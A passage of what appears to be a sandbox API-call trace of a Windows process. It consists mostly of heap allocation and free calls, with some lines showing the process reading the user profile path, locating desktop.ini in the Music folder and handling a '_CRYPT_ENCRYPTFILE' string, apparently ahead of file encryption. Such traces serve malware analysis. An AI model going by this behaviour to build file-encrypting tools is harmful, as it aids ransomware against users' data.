Size=0x10) returned 0x2e50c20 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0244.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0244.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0244.454] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0244.454] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0244.454] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0244.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0244.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.455] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0244.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0244.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0244.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0244.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0244.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0244.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0244.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0244.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0244.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0244.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0244.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0244.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0244.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0244.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0244.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0244.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0244.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0244.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0244.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0244.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0244.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.468] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.468] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0244.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0244.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0244.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0244.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0244.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.469] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87250 [0244.471] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0244.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0244.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) 